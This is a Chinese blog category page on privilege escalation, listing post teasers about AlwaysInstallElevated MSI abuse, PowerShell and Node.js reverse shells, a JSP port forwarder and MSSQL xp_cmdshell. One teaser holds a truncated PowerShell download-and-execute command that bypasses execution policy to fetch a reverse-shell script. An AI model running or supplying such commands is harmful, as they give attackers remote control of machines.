Dragon

提权

AlwaysInstallElevated 特权安全提权

AlwaysInstallElevated 特权安全提权 3

lsh4ck 4年前 (2019-06-20) 545 2

Windows环境提供组策略设置,允许常规用户安装具有系统权限的Microsoft Windows Installer程序包(MSI)。这可以在标准用户想要安装需要系统权限的应用程序的环境中发 现,并...

Get shell By Powershell

Get shell By Powershell

lsh4ck 5年前 (2019-02-20) 264 0

Invoke-PowerShellTcp.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadStr...

Node.js反向Shell

Node.js反向Shell

lsh4ck 5年前 (2019-02-20) 342 0

如下的Javascript就是一个Node.js的反向连接shell 这个payload将会生成一个/bin/sh的shell,创建一个TCP连接到攻击者的服务器,并且在通信数据流中绑定shell命令...

jsp版本lcx

jsp版本lcx

lsh4ck 5年前 (2019-01-11) 197 0

https://www.lshack.cn/lcx.jsp m = listen 需要参数:lp、lp2 该模式下,会在本地监听两个端口,相互转发数据 m = tran 需要参数:lip、lp、rip...

Mssql的xp_cmdshell组件执行FTP命令

Mssql的xp_cmdshell组件执行FTP命令

lsh4ck 5年前 (2018-12-21) 883 0

情况较为特殊,只有目录C:\Windows\Temp\,有上传权限: 这里下载的文件默认下载到c:\user\你当前用户名 目录下方,但是这个目录没可写。即便下载了也没戏,因为根本没存进去。 于是接着...

扫一扫二维码分享